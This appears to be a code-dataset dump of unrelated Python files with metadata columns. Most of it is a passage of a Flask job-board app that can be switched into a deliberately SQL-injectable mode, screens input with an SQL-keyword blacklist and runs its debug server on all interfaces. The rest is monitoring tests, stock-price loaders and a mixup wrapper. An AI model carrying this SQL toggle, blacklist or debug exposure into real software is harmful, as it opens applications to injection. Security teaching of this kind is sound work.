            d={}
            d['sid']=current_user.id
            results=db.select("select company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info where sid=:sid order by time_of_end desc",d,ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                dic={}
                dic["company_id"]=item[0]
                dic["name"]=item[1]
                dic["brief_introduce"]=item[2]
                dic["address"]=item[3]
                dic["contact_person"]=item[4]
                dic["phone_number"]=item[5]
                dic["person_num"]=item[6]
                dic["requirement"]=item[7]
                dic["time_of_end"]=item[8]
                dic["workplace"]=item[9]
                dic["salary"]=item[10]
                dic["job_title"]=item[11]
                ll.append(dic)
            return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',company_modify_self_info_result=ll,username=current_user.username)
        except:
            return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='服务器发生错误!!!',username=current_user.username)
        finally:
            db.close()
        # NOTE(review): unreachable — both the try and except paths return above.
        return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='未查询到数据,请刷新重试!',username=current_user.username)
@app.route('/company_manager_info',methods=['GET','POST'])
@login_required
@admin_required
def company_manager_info():
    """Admin overview of every company posting.

    A validated POST carrying ``delete`` removes the posting identified by
    ``pk`` and re-renders the full list; any other validated POST just
    re-renders the page; a plain GET lists all postings ordered by
    time_of_end (newest first).
    """
    form=SecrityForm()
    db=DataBasePool()
    db.connect(pool)
    if form.validate_on_submit():
        if request.form.get('delete',None)!=None:
            # Delete the selected posting, then rebuild the full listing.
            dic = {}
            type_pk = request.form.get('pk', None)
            dic['company_id'] = type_pk
            db.modify("delete from weboracle.company_info where company_id=:company_id", dic,ALLOWSQLI=ALLOWSQLI)
            db.commit()
            ll = []
            results = db.select(
                "select company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info order by time_of_end desc",ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                dic = {}
                dic["company_id"] = item[0]
                dic["name"] = item[1]
                dic["brief_introduce"] = item[2]
                dic["address"] = item[3]
                dic["contact_person"] = item[4]
                dic["phone_number"] = item[5]
                dic["person_num"] = item[6]
                dic["requirement"] = item[7]
                dic["time_of_end"] = item[8]
                dic["workplace"] = item[9]
                dic["salary"] = item[10]
                dic["job_title"] = item[11]
                ll.append(dic)
            # NOTE(review): db.close() is never called on this branch (nor on
            # the '成功' return below) — the connection is only released in the
            # GET branch's finally.  Looks like a leak; confirm whether the
            # pool reclaims it.
            return render_template('company_manager_info.html',flags=ALLOWSQLI, form=form, URL='/company_modify_self_info',
                error='删除成功',company_manager_info_result=ll, username=current_user.username)
        return render_template('company_manager_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='成功',username=current_user.username)
    else:
        # -------- plain GET: list all postings --------
        try:
            ll=[]
            results=db.select("select company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info order by time_of_end desc",ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                dic={}
                dic["company_id"]=item[0]
                dic["name"]=item[1]
                dic["brief_introduce"]=item[2]
                dic["address"]=item[3]
                dic["contact_person"]=item[4]
                dic["phone_number"]=item[5]
                dic["person_num"]=item[6]
                dic["requirement"]=item[7]
                dic["time_of_end"]=item[8]
                dic["workplace"]=item[9]
                dic["salary"]=item[10]
                dic["job_title"]=item[11]
                ll.append(dic)
            return render_template('company_manager_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',company_manager_info_result=ll,username=current_user.username)
        except:
            return render_template('company_manager_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='服务器发生错误!!!',username=current_user.username)
        finally:
            db.close()
        # NOTE(review): unreachable — both the try and except paths return above.
        return render_template('company_manager_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='未查询到数据,请刷新重试!',username=current_user.username)
@app.route('/company_info_modification',methods=['GET','POST'])
@login_required
def company_info_modification():
    """Create a new company job posting from the submitted form.

    On a validated POST every field is screened against a SQL-keyword
    blacklist (a hit is logged and rejected with HTTP 405), checked for
    emptiness and basic numeric sanity, then inserted into
    weboracle.company_info using bind variables.
    """
    form = SecrityForm()
    if form.validate_on_submit():
        company_name = request.form.get('val-company_name', None)
        brief_introduce = request.form.get('val-brief_introduce', None)
        address = request.form.get('val-address', None)
        job_type = request.form.get('val-job_type', None)
        time_of_end = request.form.get('time_of_end', None)
        workplace = request.form.get('val-workplace', None)
        company_salary = request.form.get('val-company_salary', None)
        contact_person = request.form.get('val-contact_person', None)
        phone_number = request.form.get('val-phone_number', None)
        person_num = request.form.get('val-person_num', None)
        company_suggestions = request.form.get('val-company_suggestions', None)
        # Blacklist filter applied uniformly to every field (was eleven
        # copy-pasted stanzas).  Validation now happens BEFORE the try/except
        # below: previously the bare except caught the HTTPException raised
        # by abort(405) and returned a generic error page instead of the
        # intended 405 response.
        pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
        checks = (
            ('company_name', company_name),
            ('brief_introduce', brief_introduce),
            ('address', address),
            ('job_type', job_type),
            ('time_of_end', time_of_end),
            ('workplace', workplace),
            ('company_salary', company_salary),
            ('contact_person', contact_person),
            ('phone_number', phone_number),
            ('person_num', person_num),
            ('company_suggestions', company_suggestions),
        )
        for label, value in checks:
            r = re.search(pattern, str(value).lower())
            if r:
                # Same log message format as the original per-field stanzas.
                logger.warning(label + '一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
                abort(405)
        dic = {
            "company_id": str(uuid.uuid4()).replace('-', ''),  # surrogate key
            "name": company_name,
            "brief_introduce": brief_introduce,
            "address": address,
            "contact_person": contact_person,
            "phone_number": phone_number,
            "person_num": person_num,
            "requirement": company_suggestions,
            "upload_time": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
            "time_of_end": time_of_end,
            "workplace": workplace,
            "salary": company_salary,
            "job_title": job_type,
            "sid": current_user.id,
        }
        # All fields are mandatory.
        for value in dic.values():
            if value == '':
                return render_template('company_info_modification.html', flags=ALLOWSQLI, form=form,
                                       error='所有表格都为必填项,请重新填写!', username=current_user.username)
        if not is_number(phone_number):
            return render_template('company_info_modification.html', flags=ALLOWSQLI, form=form,
                                   error='电话号码格式错误,请重新填写!', username=current_user.username)
        if not is_number(person_num):
            return render_template('company_info_modification.html', flags=ALLOWSQLI, form=form,
                                   error='人数不是整数,请重新填写!', username=current_user.username)
        # Only open the connection once the input is fully validated.
        db = DataBasePool()
        db.connect(pool)
        try:
            db.modify("insert into weboracle.company_info (company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,upload_time,time_of_end,workplace,salary,job_title,sid)values(:company_id,:name,:brief_introduce,:address,:contact_person,:phone_number,:person_num,:requirement,to_date(:upload_time,'yyyy-mm-dd hh24:mi:ss'),to_date(:time_of_end,'yyyy-mm-dd'),:workplace,:salary,:job_title,:sid)", dic, ALLOWSQLI=ALLOWSQLI)
            db.commit()
        except Exception:
            db.rollback()
            return render_template('company_info_modification.html', flags=ALLOWSQLI, form=form,
                                   error='服务器发生错误,请重试!', username=current_user.username)
        finally:
            db.close()
        return render_template('company_info_modification.html', flags=ALLOWSQLI, form=form,
                               info='发布成功!', username=current_user.username)
    return render_template('company_info_modification.html', flags=ALLOWSQLI, form=form, username=current_user.username)
@app.route('/manager_sql/<flags>',methods=['GET','POST'])
@login_required
@admin_required
def manager_sql(flags):
    """Admin toggle for the global ALLOWSQLI flag.

    ``flags`` is the URL path segment: the literal string 'True' enables the
    deliberately-vulnerable SQL mode, 'False' disables it, and any other
    value leaves the flag unchanged.  Always redirects back to the index.
    Leftover debug print statements have been removed.
    """
    global ALLOWSQLI
    if flags == 'False':
        ALLOWSQLI = False
    elif flags == 'True':
        ALLOWSQLI = True
    # Any other value: leave the current setting untouched.
    return redirect(url_for('index'))
if __name__ == "__main__":
    # NOTE(review): debug=True enables the interactive Werkzeug debugger and
    # auto-reload; combined with host='0.0.0.0' (all interfaces) on port 80
    # this is unsafe outside local development — confirm before deploying.
    # (This app is a deliberate SQLi demo, so it may be intentional.)
    app.run(host='0.0.0.0',port=80,debug=True)
| 52.694585
| 781
| 0.598833
| 8,775
| 72,982
| 4.796923
| 0.047977
| 0.040909
| 0.057967
| 0.053311
| 0.846269
| 0.819329
| 0.796356
| 0.767681
| 0.747393
| 0.720927
| 0
| 0.008823
| 0.268532
| 72,982
| 1,384
| 782
| 52.732659
| 0.779672
| 0.046916
| 0
| 0.673667
| 1
| 0.028271
| 0.276479
| 0.130097
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019386
| false
| 0.023425
| 0.025848
| 0.000808
| 0.155897
| 0.002423
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0965d46c9eafc76879381bdbbdc82e89963c6a13
| 105
|
py
|
Python
|
views.py
|
half2me/gst-web
|
1418d4fa3c11aab91296ce28a17dabcdd29b76c1
|
[
"MIT"
] | 1
|
2020-11-17T09:08:24.000Z
|
2020-11-17T09:08:24.000Z
|
views.py
|
half2me/gst-web
|
1418d4fa3c11aab91296ce28a17dabcdd29b76c1
|
[
"MIT"
] | null | null | null |
views.py
|
half2me/gst-web
|
1418d4fa3c11aab91296ce28a17dabcdd29b76c1
|
[
"MIT"
] | 1
|
2020-11-17T09:08:26.000Z
|
2020-11-17T09:08:26.000Z
|
from aiohttp import web
from aiohttp.web import Application


def setup_view(app: Application):
    """Route-registration hook for the aiohttp app; currently registers nothing."""
    pass
| 15
| 35
| 0.780952
| 15
| 105
| 5.4
| 0.666667
| 0.271605
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171429
| 105
| 6
| 36
| 17.5
| 0.931034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
09b5cec93790bf62fd21ef460334e67d05dcfa27
| 16,932
|
py
|
Python
|
tests/test_producer.py
|
tannguyen1295/WebsitesMonitoring
|
0e25d34ce7609d2ca71e39854bd41521554c00c6
|
[
"Apache-2.0"
] | 1
|
2022-02-21T12:48:21.000Z
|
2022-02-21T12:48:21.000Z
|
tests/test_producer.py
|
tannguyen1295/WebsitesMonitoring
|
0e25d34ce7609d2ca71e39854bd41521554c00c6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_producer.py
|
tannguyen1295/WebsitesMonitoring
|
0e25d34ce7609d2ca71e39854bd41521554c00c6
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import datetime
from unittest import mock
from lib.producer import Producer
class TestWebsiteChecker(unittest.TestCase):
    """Tests for Producer website validation and Kafka payload preparation.

    ``Producer._send_request`` is replaced with a mock in every test, so no
    real HTTP traffic occurs.  Every test exercises the same two-website
    fixture with small variations, so the fixture construction lives in
    private helpers instead of being copy-pasted per test.

    Fix: the original file defined
    ``test_validateWebsite_web2PageNotFound_web2ShouldReturn404`` twice; the
    second definition silently shadowed the first so that test never ran.
    The second variant is renamed below so both now execute.
    """

    def setUp(self):
        # Minimal JSON config strings accepted by Producer's constructor.
        self.configs = {
            "kafka_general": '''{
                "service_uri": "",
                "ca_path": "",
                "cert_path": "",
                "key_path": "",
                "topic": ""
            }''',
            "kafka_producer": '''{
                "request_timeout": 2
            }'''
        }
        self.mock_logger = mock.Mock()

    def _side_effect_for_send_request(self, website_1_mock_response, website_2_mock_response):
        """Patch Producer._send_request to return the two responses in order."""
        Producer._send_request = mock.Mock()
        Producer._send_request.side_effect = [website_1_mock_response, website_2_mock_response]

    def _make_response(self, status_code, text, elapsed_microseconds, date_header):
        """Build a mocked HTTP response with the attributes _validate_websites reads."""
        response = mock.Mock()
        response.status_code = status_code
        response.text = text
        response.elapsed = datetime.timedelta(microseconds=elapsed_microseconds)
        response.headers = {"Date": date_header}
        return response

    def _websites(self, website_1_regex, website_2_regex):
        """Return the two-website configuration shared by every test."""
        return [
            {
                "url": "https://www.test1.com",
                "regex": website_1_regex,
                "topic": "topic_1"
            }, {
                "url": "https://www.test2.com",
                "regex": website_2_regex,
                "topic": "topic_2"
            }]

    def _expected_entry(self, url, topic, timestamp, response_ms, status_code, regex, matched):
        """Build one expected result entry of _validate_websites.

        Pass ``timestamp=None`` for an unreachable website: its status dict
        carries no "timestamp" key (the production code autogenerates one,
        which the test deletes before comparing).
        """
        status = {
            "timestamp": timestamp,
            "response_time_in_millisecond": response_ms,
            "status_code": status_code,
            "content_validation": {
                "regex": regex,
                "content_matched": matched
            }
        }
        if timestamp is None:
            del status["timestamp"]
        return {"url": url, "topic": topic, "status": status}

    def _validate(self, websites):
        """Run _validate_websites with the shared configs and mocked logger."""
        return Producer(None, self.configs, self.mock_logger)._validate_websites(websites)

    def test_validateWebsites_normalCase_dataShouldBeParsedCorrectly(self):
        self._side_effect_for_send_request(
            self._make_response(200, "Website 1 value", 50000, "Sun, 06 Feb 2022 19:15:52 GMT"),
            self._make_response(200, "Website 2 value", 20000, "Sun, 06 Feb 2022 20:15:52 GMT"))
        result = self._validate(self._websites("[a-zA-Z0-9]", "[a-zA-Z0-9]"))
        expected_result = [
            self._expected_entry("https://www.test1.com", "topic_1",
                                 "06-02-2022T17:15:52Z", 50, 200, "[a-zA-Z0-9]", True),
            self._expected_entry("https://www.test2.com", "topic_2",
                                 "06-02-2022T18:15:52Z", 20, 200, "[a-zA-Z0-9]", True)]
        self.assertEqual(result, expected_result)

    def test_validateWebsites_web2CannotBeReached_web2ResultShouldBeNone(self):
        # A None response models an unreachable website.
        self._side_effect_for_send_request(
            self._make_response(200, "Website 1 value", 50000, "Sun, 06 Feb 2022 19:15:52 GMT"),
            None)
        # timestamp will be autogenerated using datetime.now() if the response is None
        result = self._validate(self._websites("[a-zA-Z0-9]", "[a-zA-Z0-9]"))
        del result[1]["status"]["timestamp"]
        expected_result = [
            self._expected_entry("https://www.test1.com", "topic_1",
                                 "06-02-2022T17:15:52Z", 50, 200, "[a-zA-Z0-9]", True),
            self._expected_entry("https://www.test2.com", "topic_2",
                                 None, None, None, "[a-zA-Z0-9]", None)]
        self.assertEqual(result, expected_result)

    def test_validateWebsite_web1RegexOnlyNumbers_web1ShouldNotMatch(self):
        self._side_effect_for_send_request(
            self._make_response(200, "Website 1 value", 50000, "Sun, 06 Feb 2022 19:15:52 GMT"),
            self._make_response(200, "Website 2 value", 20000, "Sun, 06 Feb 2022 20:15:52 GMT"))
        # "[0-9]" matches the "1" in "Website 1 value", but the production
        # code reports content_matched per its own semantics — expected kept
        # identical to the original test (False for web1).
        result = self._validate(self._websites("[0-9]", "[a-zA-Z0-9]"))
        expected_result = [
            self._expected_entry("https://www.test1.com", "topic_1",
                                 "06-02-2022T17:15:52Z", 50, 200, "[0-9]", False),
            self._expected_entry("https://www.test2.com", "topic_2",
                                 "06-02-2022T18:15:52Z", 20, 200, "[a-zA-Z0-9]", True)]
        self.assertEqual(result, expected_result)

    def test_validateWebsite_web2RegexOnlyAlphabet_web2ShouldNotMatch(self):
        self._side_effect_for_send_request(
            self._make_response(200, "Website 1 value", 50000, "Sun, 06 Feb 2022 19:15:52 GMT"),
            self._make_response(200, "123", 20000, "Sun, 06 Feb 2022 20:15:52 GMT"))
        result = self._validate(self._websites("[a-zA-Z0-9]", "[a-zA-Z]"))
        expected_result = [
            self._expected_entry("https://www.test1.com", "topic_1",
                                 "06-02-2022T17:15:52Z", 50, 200, "[a-zA-Z0-9]", True),
            self._expected_entry("https://www.test2.com", "topic_2",
                                 "06-02-2022T18:15:52Z", 20, 200, "[a-zA-Z]", False)]
        self.assertEqual(result, expected_result)

    def test_validateWebsite_web2PageNotFound_web2ShouldReturn404(self):
        self._side_effect_for_send_request(
            self._make_response(200, "Website 1 value", 50000, "Sun, 06 Feb 2022 19:15:52 GMT"),
            self._make_response(404, "Page Not Found", 20000, "Sun, 06 Feb 2022 20:15:52 GMT"))
        result = self._validate(self._websites("[a-zA-Z0-9]", "[a-zA-Z0-9]"))
        expected_result = [
            self._expected_entry("https://www.test1.com", "topic_1",
                                 "06-02-2022T17:15:52Z", 50, 200, "[a-zA-Z0-9]", True),
            self._expected_entry("https://www.test2.com", "topic_2",
                                 "06-02-2022T18:15:52Z", 20, 404, "[a-zA-Z0-9]", True)]
        self.assertEqual(result, expected_result)

    def test_validateWebsite_web2PageNotFoundAndRegexOnlyNumbers_web2ShouldReturn404AndNotMatch(self):
        # Renamed: previously this was a second definition of
        # test_validateWebsite_web2PageNotFound_web2ShouldReturn404, which
        # shadowed the test above so only one of the two ever ran.
        self._side_effect_for_send_request(
            self._make_response(200, "Website 1 value", 50000, "Sun, 06 Feb 2022 19:15:52 GMT"),
            self._make_response(404, "Page Not Found", 20000, "Sun, 06 Feb 2022 20:15:52 GMT"))
        result = self._validate(self._websites("[a-zA-Z0-9]", "[0-9]"))
        expected_result = [
            self._expected_entry("https://www.test1.com", "topic_1",
                                 "06-02-2022T17:15:52Z", 50, 200, "[a-zA-Z0-9]", True),
            self._expected_entry("https://www.test2.com", "topic_2",
                                 "06-02-2022T18:15:52Z", 20, 404, "[0-9]", False)]
        self.assertEqual(result, expected_result)

    def test_prepareDataForKafka_normalCase_dataShouldContainUrlAndStatusOnly(self):
        website_data = self._expected_entry(
            "https://www.test1.com", "topic_1",
            "06-02-2022T17:15:52Z", 50, 200, "[a-zA-Z0-9]", True)
        result = Producer(None, self.configs, self.mock_logger)._prepare_data_for_kafka(website_data)
        # The Kafka payload keeps url and status but drops the routing topic.
        expected_result = {
            "url": "https://www.test1.com",
            "status": {
                "timestamp": "06-02-2022T17:15:52Z",
                "response_time_in_millisecond": 50,
                "status_code": 200,
                "content_validation": {
                    "regex": "[a-zA-Z0-9]",
                    "content_matched": True
                }
            }
        }
        self.assertEqual(result, expected_result)
# Allow running this test module directly (outside a test runner).
if __name__ == '__main__':
    unittest.main()
| 38.221219
| 101
| 0.507973
| 1,668
| 16,932
| 4.797362
| 0.072542
| 0.07998
| 0.056986
| 0.094976
| 0.904649
| 0.90015
| 0.90015
| 0.896026
| 0.870657
| 0.865409
| 0
| 0.070976
| 0.384243
| 16,932
| 442
| 102
| 38.307692
| 0.696528
| 0.004489
| 0
| 0.757033
| 0
| 0
| 0.211985
| 0.023257
| 0
| 0
| 0
| 0
| 0.017903
| 1
| 0.023018
| false
| 0
| 0.01023
| 0
| 0.035806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
61fc132c1d80986b0b7011b1d49bcc32365669b4
| 1,108
|
py
|
Python
|
processor/_load_intraday.py
|
WencaiZheng/TwitterAnalysisWithEarnings
|
0e085e59353eb570d34b9f3034433b5657644916
|
[
"MIT"
] | 4
|
2020-06-29T19:47:07.000Z
|
2021-04-22T03:04:31.000Z
|
processor/_load_intraday.py
|
WencaiZheng/TwitterAnalysisWithEarnings
|
0e085e59353eb570d34b9f3034433b5657644916
|
[
"MIT"
] | null | null | null |
processor/_load_intraday.py
|
WencaiZheng/TwitterAnalysisWithEarnings
|
0e085e59353eb570d34b9f3034433b5657644916
|
[
"MIT"
] | 2
|
2020-05-30T01:57:41.000Z
|
2020-09-11T11:07:27.000Z
|
import pandas as pd
save_path = 'data\\stock_data\\'
def get_hourly_price(ticker):
    """Load intraday WRDS TAQ trades for *ticker* and aggregate to hourly OHLC bars.

    Returns a DataFrame with open/high/low/close columns plus a 'volume'
    column (hourly sum of trade sizes).
    """
    # intraday data from wrds TAQ
    print(f"Processing intraday price for {ticker}")
    trades = pd.read_csv(f'{save_path}{ticker}.csv')
    # keep only rows without a symbol suffix (the plain listing)
    trades = trades[trades['SYM_SUFFIX'].isna()]
    # index by trade timestamp built from the DATE and TIME_M columns
    stamps = trades['DATE'].astype(str) + ' ' + trades['TIME_M'].astype(str)
    trades.index = pd.to_datetime(stamps)
    # group by hour
    bars = trades['PRICE'].resample('1H').ohlc()
    bars['volume'] = trades['SIZE'].resample('1H').sum()
    return bars
def get_hourly_ratio(ticker):
    """Hourly mean trade price for *ticker*, rebased so the first hour equals 1.0."""
    # intraday data from wrds TAQ
    print(f"Processing intraday price for {ticker}")
    trades = pd.read_csv(f'{save_path}{ticker}.csv')
    # keep only rows without a symbol suffix (the plain listing)
    trades = trades[trades['SYM_SUFFIX'].isna()]
    # index by trade timestamp built from the DATE and TIME_M columns
    stamps = trades['DATE'].astype(str) + ' ' + trades['TIME_M'].astype(str)
    trades.index = pd.to_datetime(stamps)
    # group by hour, then normalize by the first hourly mean
    hourly_mean = trades['PRICE'].resample('1H').mean()
    return hourly_mean / hourly_mean.iloc[0]
| 41.037037
| 107
| 0.708484
| 166
| 1,108
| 4.487952
| 0.295181
| 0.241611
| 0.080537
| 0.107383
| 0.826846
| 0.759732
| 0.759732
| 0.759732
| 0.759732
| 0.638926
| 0
| 0.005297
| 0.148014
| 1,108
| 27
| 108
| 41.037037
| 0.783898
| 0.128159
| 0
| 0.444444
| 0
| 0
| 0.170833
| 0.047917
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.055556
| 0
| 0.277778
| 0.111111
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
110775727526137e5f9af7a85619f6e268b9cdbd
| 5,008
|
py
|
Python
|
maskrcnn_benchmark/data/datasets/mixup.py
|
microsoft/GLIP
|
fd52c6361f013e70ae7682d90b3ab3ca2bd5e6bc
|
[
"MIT"
] | 295
|
2021-12-08T02:22:27.000Z
|
2022-03-31T22:27:10.000Z
|
maskrcnn_benchmark/data/datasets/mixup.py
|
microsoft/GLIP
|
fd52c6361f013e70ae7682d90b3ab3ca2bd5e6bc
|
[
"MIT"
] | 1
|
2021-12-14T08:09:13.000Z
|
2022-03-17T03:53:19.000Z
|
maskrcnn_benchmark/data/datasets/mixup.py
|
microsoft/GLIP
|
fd52c6361f013e70ae7682d90b3ab3ca2bd5e6bc
|
[
"MIT"
] | 9
|
2021-12-09T00:33:25.000Z
|
2022-03-17T11:57:42.000Z
|
"""Mixup detection dataset wrapper."""
from __future__ import absolute_import
import numpy as np
import torch
import torch.utils.data as data
class MixupDetection(data.Dataset):
    """Detection dataset wrapper that performs mixup for normal dataset.

    Parameters
    ----------
    dataset : mx.gluon.data.Dataset
        Gluon dataset object.
    mixup : callable random generator, e.g. np.random.uniform
        A random mixup ratio sampler, preferably a random generator from numpy.random
        A random float will be sampled each time with mixup(*args).
        Use None to disable.
    *args : list
        Additional arguments for mixup random sampler.
    """

    def __init__(self, dataset, mixup=None, preproc=None, *args):
        # NOTE(review): torch's data.Dataset.__init__ takes no arguments, and
        # `Dataset` (the decorator below) is not imported in this module.
        # Presumably both come from a project-local Dataset base class that
        # accepts input_dim — confirm.
        super().__init__(dataset.input_dim)
        self._dataset = dataset
        self.preproc = preproc
        self._mixup = mixup
        self._mixup_args = args

    def set_mixup(self, mixup=None, *args):
        """Set mixup random sampler, use None to disable.

        Parameters
        ----------
        mixup : callable random generator, e.g. np.random.uniform
            A random mixup ratio sampler, preferably a random generator from numpy.random
            A random float will be sampled each time with mixup(*args)
        *args : list
            Additional arguments for mixup random sampler.
        """
        self._mixup = mixup
        self._mixup_args = args

    def __len__(self):
        return len(self._dataset)

    def _mix_item(self, idx):
        """Shared implementation for __getitem__ and pull_item.

        Draws a mixup ratio lambda, blends the sample at ``idx`` with a second
        randomly chosen sample, appends each label set's mixup weight as a
        trailing column, and returns ``(image, labels, img_info, idx)``
        (preprocessed when ``self.preproc`` is set).

        The original file duplicated this body in both __getitem__ and
        pull_item; pull_item additionally unpacked the second sample as a
        2-tuple (``img2, label2 = ...``) although pull_item returns 4 values —
        a guaranteed ValueError.  Both methods now delegate here.
        """
        self._dataset._input_dim = self.input_dim
        # first image
        img1, label1, _, _ = self._dataset.pull_item(idx)
        lambd = 1
        # draw a random lambda ratio from distribution, clipped into [0, 1]
        if self._mixup is not None:
            lambd = max(0, min(1, self._mixup(*self._mixup_args)))
        if lambd >= 1:
            # degenerate mixup: keep only the first image, each label gets weight 1
            weights1 = np.ones((label1.shape[0], 1))
            label1 = np.hstack((label1, weights1))
            height, width, _ = img1.shape
            img_info = (width, height)
            if self.preproc is not None:
                img_o, target_o = self.preproc(img1, label1, self.input_dim)
                return img_o, target_o, img_info, idx
            # NOTE(review): when preproc is None this falls through and mixes
            # anyway (with label1 already carrying the weight column) — this
            # matches the original behavior; confirm it is intended.
        # second image: any index other than idx
        idx2 = int(np.random.choice(np.delete(np.arange(len(self)), idx)))
        img2, label2, _, _ = self._dataset.pull_item(idx2)
        # mixup two images onto a canvas large enough for both
        height = max(img1.shape[0], img2.shape[0])
        width = max(img1.shape[1], img2.shape[1])
        mix_img = np.zeros((height, width, 3), dtype=np.float32)
        mix_img[:img1.shape[0], :img1.shape[1], :] = img1.astype(np.float32) * lambd
        mix_img[:img2.shape[0], :img2.shape[1], :] += img2.astype(np.float32) * (1. - lambd)
        mix_img = mix_img.astype(np.uint8)
        # append each label set's mixup weight as a trailing column
        y1 = np.hstack((label1, np.full((label1.shape[0], 1), lambd)))
        y2 = np.hstack((label2, np.full((label2.shape[0], 1), 1. - lambd)))
        mix_label = np.vstack((y1, y2))
        # Fix: the original returned `padded_labels`, which was unbound when
        # preproc was None (NameError).  Reassigning mix_label keeps the
        # preproc path identical and makes the no-preproc path return the raw
        # mixed labels.
        if self.preproc is not None:
            mix_img, mix_label = self.preproc(mix_img, mix_label, self.input_dim)
        img_info = (width, height)
        return mix_img, mix_label, img_info, idx

    @Dataset.resize_getitem
    def __getitem__(self, idx):
        return self._mix_item(idx)

    def pull_item(self, idx):
        return self._mix_item(idx)
| 40.064
| 93
| 0.589457
| 662
| 5,008
| 4.294562
| 0.170695
| 0.033767
| 0.025325
| 0.025325
| 0.821667
| 0.821667
| 0.821667
| 0.821667
| 0.763982
| 0.763982
| 0
| 0.033765
| 0.290335
| 5,008
| 124
| 94
| 40.387097
| 0.766179
| 0.196086
| 0
| 0.773333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.053333
| 0.013333
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1160ab753e9d3b321e08767d2e36bfc9563a0c01
| 46
|
py
|
Python
|
lf3py/i18n/__init__.py
|
rog-works/lf3py
|
e89937f7aa133ed54d85764f06101ab9abf6b960
|
[
"CNRI-Python"
] | null | null | null |
lf3py/i18n/__init__.py
|
rog-works/lf3py
|
e89937f7aa133ed54d85764f06101ab9abf6b960
|
[
"CNRI-Python"
] | 48
|
2020-12-19T13:47:26.000Z
|
2021-01-07T22:27:56.000Z
|
lf3py/i18n/__init__.py
|
rog-works/lf3py
|
e89937f7aa133ed54d85764f06101ab9abf6b960
|
[
"CNRI-Python"
] | null | null | null |
from lf3py.i18n.i18n import I18n # noqa F401
| 23
| 45
| 0.76087
| 8
| 46
| 4.375
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.263158
| 0.173913
| 46
| 1
| 46
| 46
| 0.657895
| 0.195652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fecbb2dd06f2428ce913b67df269d56c82845228
| 6,549
|
py
|
Python
|
src/cr/sparse/_src/pursuit/sp.py
|
carnot-shailesh/cr-sparse
|
989ebead8a8ac37ade643093e1caa31ae2a3eda1
|
[
"Apache-2.0"
] | 42
|
2021-06-11T17:11:29.000Z
|
2022-03-29T11:51:44.000Z
|
src/cr/sparse/_src/pursuit/sp.py
|
carnot-shailesh/cr-sparse
|
989ebead8a8ac37ade643093e1caa31ae2a3eda1
|
[
"Apache-2.0"
] | 19
|
2021-06-04T11:36:11.000Z
|
2022-01-22T20:13:39.000Z
|
